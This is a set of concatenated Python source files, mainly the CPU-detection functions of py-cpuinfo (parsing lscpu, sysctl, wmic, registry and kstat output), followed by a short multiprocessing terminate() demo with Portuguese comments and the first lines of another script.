		'vendor_id' : vendor_id,
		'stepping' : stepping,
		'model' : model,
		'family' : family,
		}

		# Make the Hz the same for actual and advertised if missing any
		if not hz_advertised or hz_advertised == '0.0':
			hz_advertised = hz_actual
			scale = 6
		elif not hz_actual or hz_actual == '0.0':
			hz_actual = hz_advertised

		# Add the Hz if there is one
		if to_raw_hz(hz_advertised, scale) > (0, 0):
			info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
			info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
		if to_raw_hz(hz_actual, scale) > (0, 0):
			info['hz_actual'] = to_friendly_hz(hz_actual, 6)
			info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except:
		#raise # NOTE: To have this throw on error, uncomment this line
		return {}
def _get_cpu_info_from_cpufreq_info():
	'''
	Returns the CPU info gathered from cpufreq-info.
	Returns {} if cpufreq-info is not found.
	'''
	try:
		scale, hz_brand = 1, '0.0'

		if not DataSource.has_cpufreq_info():
			return {}

		returncode, output = DataSource.cpufreq_info()
		if returncode != 0:
			return {}

		# Isolate the "... Hz" token of the current-frequency line
		hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
		i = hz_brand.find('Hz')
		assert(i != -1)
		hz_brand = hz_brand[0 : i+2].strip().lower()

		# Pick the decimal scale from the unit
		if hz_brand.endswith('mhz'):
			scale = 6
		elif hz_brand.endswith('ghz'):
			scale = 9

		# Remove the unit suffix itself. The original used
		# rstrip('mhz').rstrip('ghz'), but rstrip() strips a *character
		# set*, not a suffix, and only worked by coincidence (and dropped
		# a plain 'hz' only because h/z are in the first set).
		for suffix in ('mhz', 'ghz', 'hz'):
			if hz_brand.endswith(suffix):
				hz_brand = hz_brand[:-len(suffix)]
				break
		hz_brand = hz_brand.strip()
		hz_brand = to_hz_string(hz_brand)

		info = {
			'hz_advertised' : to_friendly_hz(hz_brand, scale),
			'hz_actual' : to_friendly_hz(hz_brand, scale),
			'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
			'hz_actual_raw' : to_raw_hz(hz_brand, scale),
		}

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except Exception:
		#raise # NOTE: To have this throw on error, uncomment this line
		return {}
def _get_cpu_info_from_lscpu():
	'''
	Returns the CPU info gathered from lscpu.
	Returns {} if lscpu is not found.

	Each field is optional: it is only added to the result when lscpu
	reported it (and, for numeric fields, when it parses as an int).
	'''
	try:
		if not DataSource.has_lscpu():
			return {}

		returncode, output = DataSource.lscpu()
		if returncode != 0:
			return {}

		info = {}

		# Frequency: prefer the max MHz, fall back to current MHz
		new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
		if new_hz:
			new_hz = to_hz_string(new_hz)
			scale = 6
			info['hz_advertised'] = to_friendly_hz(new_hz, scale)
			info['hz_actual'] = to_friendly_hz(new_hz, scale)
			info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
			info['hz_actual_raw'] = to_raw_hz(new_hz, scale)

		vendor_id = _get_field(False, output, None, None, 'Vendor ID')
		if vendor_id:
			info['vendor_id'] = vendor_id

		brand = _get_field(False, output, None, None, 'Model name')
		if brand:
			info['brand'] = brand

		family = _get_field(False, output, None, None, 'CPU family')
		if family and family.isdigit():
			info['family'] = int(family)

		stepping = _get_field(False, output, None, None, 'Stepping')
		if stepping and stepping.isdigit():
			info['stepping'] = int(stepping)

		model = _get_field(False, output, None, None, 'Model')
		if model and model.isdigit():
			info['model'] = int(model)

		# Cache sizes (reported by lscpu as strings like "32K")
		l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
		if l1_data_cache_size:
			info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)

		l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
		if l1_instruction_cache_size:
			info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)

		l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
		if l2_cache_size:
			info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)

		l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
		if l3_cache_size:
			info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)

		# Flags
		flags = _get_field(False, output, None, None, 'flags', 'Features')
		if flags:
			flags = flags.split()
			flags.sort()
			info['flags'] = flags

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except:
		#raise # NOTE: To have this throw on error, uncomment this line
		return {}
def _get_cpu_info_from_dmesg():
	'''
	Returns the CPU info gathered from dmesg.
	Returns {} if dmesg is not found or does not have the desired info.
	'''
	# Bail out early when the dmesg binary is not available
	if not DataSource.has_dmesg():
		return {}

	returncode, output = DataSource.dmesg_a()
	# A failed run or empty capture means there is nothing to parse
	if returncode != 0 or output == None:
		return {}

	return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
	'''
	Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
	Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.

	Decodes the first 8 bytes of the pa-features property as two big-endian
	uint32 values and maps individual bits to POWER feature flag names per
	the LoPAPR spec referenced above.
	'''
	try:
		# Just return {} if there is no lsprop
		if not DataSource.has_ibm_pa_features():
			return {}

		# If ibm,pa-features fails return {}
		returncode, output = DataSource.ibm_pa_features()
		if output == None or returncode != 0:
			return {}

		# Filter out invalid characters from output, keeping only hex digits
		value = output.split("ibm,pa-features")[1].lower()
		value = [s for s in value if s in list('0123456789abcfed')]
		value = ''.join(value)

		# Get data converted to Uint32 chunks
		left = int(value[0 : 8], 16)
		right = int(value[8 : 16], 16)

		# Get the CPU flags (bit 0 is the most significant bit of each word;
		# commented-out entries are reserved bits per the spec)
		flags = {
			# Byte 0
			'mmu' : is_bit_set(left, 0),
			'fpu' : is_bit_set(left, 1),
			'slb' : is_bit_set(left, 2),
			'run' : is_bit_set(left, 3),
			#'reserved' : is_bit_set(left, 4),
			'dabr' : is_bit_set(left, 5),
			'ne' : is_bit_set(left, 6),
			'wtr' : is_bit_set(left, 7),

			# Byte 1
			'mcr' : is_bit_set(left, 8),
			'dsisr' : is_bit_set(left, 9),
			'lp' : is_bit_set(left, 10),
			'ri' : is_bit_set(left, 11),
			'dabrx' : is_bit_set(left, 12),
			'sprg3' : is_bit_set(left, 13),
			'rislb' : is_bit_set(left, 14),
			'pp' : is_bit_set(left, 15),

			# Byte 2
			'vpm' : is_bit_set(left, 16),
			'dss_2.05' : is_bit_set(left, 17),
			#'reserved' : is_bit_set(left, 18),
			'dar' : is_bit_set(left, 19),
			#'reserved' : is_bit_set(left, 20),
			'ppr' : is_bit_set(left, 21),
			'dss_2.02' : is_bit_set(left, 22),
			'dss_2.06' : is_bit_set(left, 23),

			# Byte 3
			'lsd_in_dscr' : is_bit_set(left, 24),
			'ugr_in_dscr' : is_bit_set(left, 25),
			#'reserved' : is_bit_set(left, 26),
			#'reserved' : is_bit_set(left, 27),
			#'reserved' : is_bit_set(left, 28),
			#'reserved' : is_bit_set(left, 29),
			#'reserved' : is_bit_set(left, 30),
			#'reserved' : is_bit_set(left, 31),

			# Byte 4
			'sso_2.06' : is_bit_set(right, 0),
			#'reserved' : is_bit_set(right, 1),
			#'reserved' : is_bit_set(right, 2),
			#'reserved' : is_bit_set(right, 3),
			#'reserved' : is_bit_set(right, 4),
			#'reserved' : is_bit_set(right, 5),
			#'reserved' : is_bit_set(right, 6),
			#'reserved' : is_bit_set(right, 7),

			# Byte 5
			'le' : is_bit_set(right, 8),
			'cfar' : is_bit_set(right, 9),
			'eb' : is_bit_set(right, 10),
			'lsq_2.07' : is_bit_set(right, 11),
			#'reserved' : is_bit_set(right, 12),
			#'reserved' : is_bit_set(right, 13),
			#'reserved' : is_bit_set(right, 14),
			#'reserved' : is_bit_set(right, 15),

			# Byte 6
			'dss_2.07' : is_bit_set(right, 16),
			#'reserved' : is_bit_set(right, 17),
			#'reserved' : is_bit_set(right, 18),
			#'reserved' : is_bit_set(right, 19),
			#'reserved' : is_bit_set(right, 20),
			#'reserved' : is_bit_set(right, 21),
			#'reserved' : is_bit_set(right, 22),
			#'reserved' : is_bit_set(right, 23),

			# Byte 7
			#'reserved' : is_bit_set(right, 24),
			#'reserved' : is_bit_set(right, 25),
			#'reserved' : is_bit_set(right, 26),
			#'reserved' : is_bit_set(right, 27),
			#'reserved' : is_bit_set(right, 28),
			#'reserved' : is_bit_set(right, 29),
			#'reserved' : is_bit_set(right, 30),
			#'reserved' : is_bit_set(right, 31),
		}

		# Get a list of only the flags that are true
		flags = [k for k, v in flags.items() if v]
		flags.sort()

		info = {
			'flags' : flags
		}
		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}

		return info
	except:
		return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
	'''
	Returns the CPU info gathered from /var/run/dmesg.boot.
	Returns {} if dmesg is not found or does not have the desired info.
	'''
	# Nothing to do when the boot log file is absent
	if not DataSource.has_var_run_dmesg_boot():
		return {}

	returncode, output = DataSource.cat_var_run_dmesg_boot()
	# Give up on a failed read or an empty capture
	if returncode != 0 or output == None:
		return {}

	return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
	'''
	Returns the CPU info gathered from sysctl.
	Returns {} if sysctl is not found.

	Reads the machdep.cpu.* and hw.cpufrequency keys (BSD/macOS style).
	'''
	try:
		# Just return {} if there is no sysctl
		if not DataSource.has_sysctl():
			return {}

		# If sysctl fails return {}
		returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
		if output == None or returncode != 0:
			return {}

		# Various fields
		vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
		processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
		cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
		stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
		model = _get_field(False, output, int, 0, 'machdep.cpu.model')
		family = _get_field(False, output, int, 0, 'machdep.cpu.family')

		# Flags: union of the three feature lists sysctl exposes
		flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
		flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
		flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
		flags.sort()

		# Convert from GHz/MHz string to Hz; hw.cpufrequency is already
		# in Hz, hence the scale of 0 for the actual values below
		scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
		hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
		hz_actual = to_hz_string(hz_actual)

		info = {
		'vendor_id' : vendor_id,
		'brand' : processor_brand,

		'hz_advertised' : to_friendly_hz(hz_advertised, scale),
		'hz_actual' : to_friendly_hz(hz_actual, 0),
		'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
		'hz_actual_raw' : to_raw_hz(hz_actual, 0),

		'l2_cache_size' : to_friendly_bytes(cache_size),

		'stepping' : stepping,
		'model' : model,
		'family' : family,
		'flags' : flags
		}

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except:
		return {}
def _get_cpu_info_from_sysinfo():
	'''
	Returns the CPU info gathered from sysinfo.
	Returns {} if sysinfo is not found.
	'''
	# Merge both sysinfo output layouts; fields from v2 win on conflict.
	combined = _get_cpu_info_from_sysinfo_v1()
	combined.update(_get_cpu_info_from_sysinfo_v2())
	return combined
def _get_cpu_info_from_sysinfo_v1():
	'''
	Returns the CPU info gathered from sysinfo.
	Returns {} if sysinfo is not found.

	Parses the older (v1) Haiku sysinfo layout, where stepping/model/family
	appear inline on the "CPU #0" line.
	'''
	try:
		# Just return {} if there is no sysinfo
		if not DataSource.has_sysinfo():
			return {}

		# If sysinfo fails return {}
		returncode, output = DataSource.sysinfo_cpu()
		if output == None or returncode != 0:
			return {}

		# Various fields (vendor id / cache size are not present in this
		# layout, so they are left empty and filtered out below)
		vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
		processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
		cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
		stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
		model = int(output.split(', model ')[1].split(',')[0].strip())
		family = int(output.split(', family ')[1].split(',')[0].strip())

		# Flags: double-tab-indented lines hold the feature names
		flags = []
		for line in output.split('\n'):
			if line.startswith('\t\t'):
				for flag in line.strip().lower().split():
					flags.append(flag)
		flags.sort()

		# Convert from GHz/MHz string to Hz; no measured frequency is
		# available, so actual is taken from the brand string as well
		scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
		hz_actual = hz_advertised

		info = {
		'vendor_id' : vendor_id,
		'brand' : processor_brand,

		'hz_advertised' : to_friendly_hz(hz_advertised, scale),
		'hz_actual' : to_friendly_hz(hz_actual, scale),
		'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
		'hz_actual_raw' : to_raw_hz(hz_actual, scale),

		'l2_cache_size' : to_friendly_bytes(cache_size),

		'stepping' : stepping,
		'model' : model,
		'family' : family,
		'flags' : flags
		}

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except:
		return {}
def _get_cpu_info_from_sysinfo_v2():
	'''
	Returns the CPU info gathered from sysinfo.
	Returns {} if sysinfo is not found.

	Parses the newer (v2) Haiku sysinfo layout, where stepping/model/family
	live on a separate "Signature:" line and flags are split across three
	indented feature subsections.
	'''
	try:
		# Just return {} if there is no sysinfo
		if not DataSource.has_sysinfo():
			return {}

		# If sysinfo fails return {}
		returncode, output = DataSource.sysinfo_cpu()
		if output == None or returncode != 0:
			return {}

		# Various fields (vendor id / cache size are not present in this
		# layout, so they are left empty and filtered out below)
		vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
		processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
		cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
		signature = output.split('Signature:')[1].split('\n')[0].strip()
		#
		stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
		model = int(signature.split('model ')[1].split(',')[0].strip())
		family = int(signature.split('family ')[1].split(',')[0].strip())

		# Flags
		def get_subsection_flags(output):
			# Collect the space-indented continuation lines that follow a
			# feature-section header, stopping at the first unindented line
			retval = []
			for line in output.split('\n')[1:]:
				if not line.startswith('  '): break
				for entry in line.strip().lower().split(' '):
					retval.append(entry)
			return retval

		flags = get_subsection_flags(output.split('Features: ')[1]) + \
			get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
			get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
		flags.sort()

		# Convert from GHz/MHz string to Hz; no measured frequency is
		# available, so actual is taken from the brand string as well
		scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
		hz_actual = hz_advertised

		info = {
		'vendor_id' : vendor_id,
		'brand' : processor_brand,

		'hz_advertised' : to_friendly_hz(hz_advertised, scale),
		'hz_actual' : to_friendly_hz(hz_actual, scale),
		'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
		'hz_actual_raw' : to_raw_hz(hz_actual, scale),

		'l2_cache_size' : to_friendly_bytes(cache_size),

		'stepping' : stepping,
		'model' : model,
		'family' : family,
		'flags' : flags
		}

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except:
		return {}
def _get_cpu_info_from_wmic():
	'''
	Returns the CPU info gathered from WMI.
	Returns {} if not on Windows, or wmic is not installed.
	'''
	try:
		# Just return {} if not Windows or there is no wmic
		if not DataSource.is_windows or not DataSource.has_wmic():
			return {}

		returncode, output = DataSource.wmic_cpu()
		if output == None or returncode != 0:
			return {}

		# Break the list into key value pairs.
		# Split on the FIRST '=' only: values such as brand strings may
		# themselves contain '=', which previously produced a 3+ element
		# list and made the dict comprehension below raise ValueError.
		value = output.split("\n")
		value = [s.rstrip().split('=', 1) for s in value if '=' in s]
		value = {k: v for k, v in value if v}

		# Get the advertised MHz (parsed out of the brand string)
		processor_brand = value.get('Name')
		scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)

		# Get the actual MHz
		hz_actual = value.get('CurrentClockSpeed')
		scale_actual = 6
		if hz_actual:
			hz_actual = to_hz_string(hz_actual)

		# Get cache sizes (wmic reports them in KB without a unit)
		l2_cache_size = value.get('L2CacheSize')
		if l2_cache_size:
			l2_cache_size = l2_cache_size + ' KB'

		l3_cache_size = value.get('L3CacheSize')
		if l3_cache_size:
			l3_cache_size = l3_cache_size + ' KB'

		# Get family, model, and stepping out of the free-form description
		# (e.g. "Intel64 Family 6 Model 42 Stepping 7")
		family, model, stepping = '', '', ''
		description = value.get('Description') or value.get('Caption')
		entries = description.split(' ')

		if 'Family' in entries and entries.index('Family') < len(entries)-1:
			i = entries.index('Family')
			family = int(entries[i + 1])

		if 'Model' in entries and entries.index('Model') < len(entries)-1:
			i = entries.index('Model')
			model = int(entries[i + 1])

		if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
			i = entries.index('Stepping')
			stepping = int(entries[i + 1])

		info = {
			'vendor_id' : value.get('Manufacturer'),
			'brand' : processor_brand,

			'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
			'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
			'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
			'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),

			'l2_cache_size' : l2_cache_size,
			'l3_cache_size' : l3_cache_size,

			'stepping' : stepping,
			'model' : model,
			'family' : family,
		}

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except Exception:
		#raise # NOTE: To have this throw on error, uncomment this line
		return {}
def _get_cpu_info_from_registry():
	'''
	FIXME: Is missing many of the newer CPU flags like sse3
	Returns the CPU info gathered from the Windows Registry.
	Returns {} if not on Windows.

	The feature flags come from the registry's FeatureSet bitfield, which
	mirrors CPUID leaf 1 EDX (bit 0 = most significant here).
	'''
	try:
		# Just return {} if not on Windows
		if not DataSource.is_windows:
			return {}

		# Get the CPU name
		processor_brand = DataSource.winreg_processor_brand()

		# Get the CPU vendor id
		vendor_id = DataSource.winreg_vendor_id()

		# Get the CPU arch and bits
		raw_arch_string = DataSource.winreg_raw_arch_string()
		arch, bits = parse_arch(raw_arch_string)

		# Get the actual CPU Hz (the registry stores MHz, hence scale 6 below)
		hz_actual = DataSource.winreg_hz_actual()
		hz_actual = to_hz_string(hz_actual)

		# Get the advertised CPU Hz (parsed out of the brand string)
		scale, hz_advertised = _get_hz_string_from_brand(processor_brand)

		# Get the CPU features
		feature_bits = DataSource.winreg_feature_bits()

		def is_set(bit):
			# Bit 0 is the most significant bit of the 32 bit field
			mask = 0x80000000 >> bit
			retval = mask & feature_bits > 0
			return retval

		# http://en.wikipedia.org/wiki/CPUID
		# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
		# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
		flags = {
			'fpu' : is_set(0), # Floating Point Unit
			'vme' : is_set(1), # V86 Mode Extensions
			'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
			'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
			'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
			'msr' : is_set(5), # Model Specific Registers
			'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
			'mce' : is_set(7), # Machine Check Exception supported
			'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
			'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
			'sepamd' : is_set(10), # Fast system calls (AMD only)
			'sep' : is_set(11), # Fast system calls
			'mtrr' : is_set(12), # Memory Type Range Registers
			'pge' : is_set(13), # Page Global Enable
			'mca' : is_set(14), # Machine Check Architecture
			'cmov' : is_set(15), # Conditional MOVe instructions
			'pat' : is_set(16), # Page Attribute Table
			'pse36' : is_set(17), # 36 bit Page Size Extensions
			'serial' : is_set(18), # Processor Serial Number
			'clflush' : is_set(19), # Cache Flush
			#'reserved1' : is_set(20), # reserved
			'dts' : is_set(21), # Debug Trace Store
			'acpi' : is_set(22), # ACPI support
			'mmx' : is_set(23), # MultiMedia Extensions
			'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
			'sse' : is_set(25), # SSE instructions
			'sse2' : is_set(26), # SSE2 (WNI) instructions
			'ss' : is_set(27), # self snoop
			#'reserved2' : is_set(28), # reserved
			'tm' : is_set(29), # Automatic clock control
			'ia64' : is_set(30), # IA64 instructions
			'3dnow' : is_set(31) # 3DNow! instructions available
		}

		# Get a list of only the flags that are true
		flags = [k for k, v in flags.items() if v]
		flags.sort()

		info = {
		'vendor_id' : vendor_id,
		'brand' : processor_brand,

		'hz_advertised' : to_friendly_hz(hz_advertised, scale),
		'hz_actual' : to_friendly_hz(hz_actual, 6),
		'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
		'hz_actual_raw' : to_raw_hz(hz_actual, 6),

		'flags' : flags
		}

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except:
		return {}
def _get_cpu_info_from_kstat():
	'''
	Returns the CPU info gathered from isainfo and kstat.
	Returns {} if isainfo or kstat are not found.

	Solaris style source: flags come from "isainfo -vb", everything else
	from the tab-prefixed fields of "kstat -m cpu_info".
	'''
	try:
		# Just return {} if there is no isainfo or kstat
		if not DataSource.has_isainfo() or not DataSource.has_kstat():
			return {}

		# If isainfo fails return {}
		returncode, flag_output = DataSource.isainfo_vb()
		if flag_output == None or returncode != 0:
			return {}

		# If kstat fails return {}
		returncode, kstat = DataSource.kstat_m_cpu_info()
		if kstat == None or returncode != 0:
			return {}

		# Various fields
		vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
		processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
		stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
		model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
		family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())

		# Flags: the last line of isainfo output holds the feature names
		flags = flag_output.strip().split('\n')[-1].strip().lower().split()
		flags.sort()

		# Convert from GHz/MHz string to Hz (clock_MHz is in MHz -> scale 6)
		scale = 6
		hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
		hz_advertised = to_hz_string(hz_advertised)

		# Convert from GHz/MHz string to Hz (current_clock_Hz is already
		# in Hz, hence the scale of 0 below)
		hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
		hz_actual = to_hz_string(hz_actual)

		info = {
		'vendor_id' : vendor_id,
		'brand' : processor_brand,

		'hz_advertised' : to_friendly_hz(hz_advertised, scale),
		'hz_actual' : to_friendly_hz(hz_actual, 0),
		'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
		'hz_actual_raw' : to_raw_hz(hz_actual, 0),

		'stepping' : stepping,
		'model' : model,
		'family' : family,
		'flags' : flags
		}

		# Remove any empty/falsy fields
		info = {k: v for k, v in info.items() if v}
		return info
	except:
		return {}
def CopyNewFields(info, new_info):
	"""Merge fields from *new_info* into *info*, in place.

	A field is copied only when *info* does not already hold a truthy
	value for it. 'flags' is special cased: when both dicts carry flags,
	the lists are unioned (keeping info's entries) and sorted.
	"""
	keys = [
		'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
		'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
		'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
		'l2_cache_associativity', 'stepping', 'model', 'family',
		'processor_type', 'extended_model', 'extended_family', 'flags',
		'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
	]

	for key in keys:
		incoming = new_info.get(key, None)
		if incoming and not info.get(key, None):
			# First source to report a field wins
			info[key] = incoming
		elif key == 'flags' and new_info.get('flags'):
			# Both sides have flags: union them into info's list
			existing = info['flags']
			for flag in new_info['flags']:
				if flag not in existing:
					existing.append(flag)
			existing.sort()
def get_cpu_info():
	'''
	Returns the CPU info by using the best sources of information for your OS.
	Returns {} if nothing is found.
	'''
	# Get the CPU arch and bits
	arch, bits = parse_arch(DataSource.raw_arch_string)

	friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
	friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
	PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)

	info = {
		'python_version' : PYTHON_VERSION,
		'cpuinfo_version' : CPUINFO_VERSION,
		'arch' : arch,
		'bits' : bits,
		'count' : DataSource.cpu_count,
		'raw_arch_string' : DataSource.raw_arch_string,
	}

	# Query each platform specific source in priority order; earlier
	# sources win, because CopyNewFields never overwrites a field that is
	# already present.
	sources = [
		_get_cpu_info_from_wmic,                   # Windows wmic
		_get_cpu_info_from_registry,               # Windows registry
		_get_cpu_info_from_proc_cpuinfo,           # /proc/cpuinfo
		_get_cpu_info_from_cpufreq_info,           # cpufreq-info
		_get_cpu_info_from_lscpu,                  # lscpu
		_get_cpu_info_from_sysctl,                 # sysctl
		_get_cpu_info_from_kstat,                  # kstat
		_get_cpu_info_from_dmesg,                  # dmesg
		_get_cpu_info_from_cat_var_run_dmesg_boot, # /var/run/dmesg.boot
		_get_cpu_info_from_ibm_pa_features,        # lsprop ibm,pa-features
		_get_cpu_info_from_sysinfo,                # sysinfo
		_get_cpu_info_from_cpuid,                  # CPU cpuid register
	]
	for source in sources:
		CopyNewFields(info, source())

	return info
# Make sure we are running on a supported system
def _check_arch():
	"""Raise an Exception when the host CPU architecture is unsupported."""
	arch, bits = parse_arch(DataSource.raw_arch_string)
	supported = ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64']
	if arch not in supported:
		raise Exception("py-cpuinfo currently only works on X86 and some PPC and ARM CPUs.")
def main():
	"""Command line entry point: print every known CPU field, or exit 1."""
	try:
		_check_arch()
	except Exception as err:
		sys.stderr.write(str(err) + "\n")
		sys.exit(1)

	info = get_cpu_info()

	if not info:
		sys.stderr.write("Failed to find cpu info\n")
		sys.exit(1)

	# Print every field with its human readable label (flags are joined
	# into a single comma separated line at the end)
	fields = [
		('python version', 'python_version'),
		('cpuinfo version', 'cpuinfo_version'),
		('Vendor ID', 'vendor_id'),
		('Hardware Raw', 'hardware'),
		('Brand', 'brand'),
		('Hz Advertised', 'hz_advertised'),
		('Hz Actual', 'hz_actual'),
		('Hz Advertised Raw', 'hz_advertised_raw'),
		('Hz Actual Raw', 'hz_actual_raw'),
		('Arch', 'arch'),
		('Bits', 'bits'),
		('Count', 'count'),
		('Raw Arch String', 'raw_arch_string'),
		('L1 Data Cache Size', 'l1_data_cache_size'),
		('L1 Instruction Cache Size', 'l1_instruction_cache_size'),
		('L2 Cache Size', 'l2_cache_size'),
		('L2 Cache Line Size', 'l2_cache_line_size'),
		('L2 Cache Associativity', 'l2_cache_associativity'),
		('L3 Cache Size', 'l3_cache_size'),
		('Stepping', 'stepping'),
		('Model', 'model'),
		('Family', 'family'),
		('Processor Type', 'processor_type'),
		('Extended Model', 'extended_model'),
		('Extended Family', 'extended_family'),
	]
	for label, key in fields:
		print('{0}: {1}'.format(label, info.get(key, '')))
	print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
# Script usage runs main() (freeze_support is required for frozen Windows
# executables that use multiprocessing); importing as a module only
# validates that the host architecture is supported.
if __name__ == '__main__':
	from multiprocessing import freeze_support
	freeze_support()
	main()
else:
	_check_arch()
|
kill_a_process.py |
import multiprocessing
import time
"""
importante
possiveis valores de código de saída
1. ==0 : não houve erros
2. >0: houve erro
3. <0: não ouve erro, mas o processo foi matado, onde o valor significa -1 * ExitCode
"""
def foo():
    """Tiny worker used to demonstrate terminate(): announce start, idle 100 ms, announce end."""
    banner_start, banner_end = 'Starting function', 'Finished function'
    print(banner_start)
    time.sleep(0.1)
    print(banner_end)
# Demo of multiprocessing.Process.terminate(): exit code semantics are
# (see the note at the top of this file) 0 = ok, >0 = error, <0 = killed
# by signal, where the value is -1 * signal number (-15 == SIGTERM).
if __name__ == '__main__':
    p = multiprocessing.Process(target=foo)
    print ('Process before execution:', p, p.is_alive())
    p.start()
    print ('Process running:', p, p.is_alive())
    # terminate() only *requests* termination; the child may still report
    # is_alive() == True until it is reaped by join().
    p.terminate()
    # time.sleep(5) # my modification
    # Author's note (Portuguese): with the 5 s sleep enabled the output below
    # shows the process already stopped before join() — i.e. termination
    # appears to take effect "one instruction later" without the sleep.
    """
Quando coloco esse termporizado de 5 segundos, a saída fica assim
Process before execution: <Process name='Process-1' parent=11720 initial> False
Process running: <Process name='Process-1' pid=11721 parent=11720 started> True
Process terminated: <Process name='Process-1' pid=11721 parent=11720 stopped exitcode=-SIGTERM> False
Process joined: <Process name='Process-1' pid=11721 parent=11720 stopped exitcode=-SIGTERM> False
Process exit code: -15
#######
ou seja, é como se o processo terminasse depois da execução da próxima instrução, o que não deveria acontecer
"""
    print ('Process terminated:', p, p.is_alive())
    p.join()
    print ('Process joined:', p, p.is_alive())
    print ('Process exit code:', p.exitcode)
    # Author's sample output WITHOUT the sleep: note the process is still
    # alive right after terminate() and only stops once joined.
    """
Process before execution: <Process name='Process-1' parent=11490 initial> False
Process running: <Process name='Process-1' pid=11491 parent=11490 started> True
Process terminated: <Process name='Process-1' pid=11491 parent=11490 started> True
Process joined: <Process name='Process-1' pid=11491 parent=11490 stopped exitcode=-SIGTERM> False
Process exit code: -15
"""
|
hmp_daemon.py | import time, requests, threading, os, atexit
from UTILS.colorful import *
import psutil
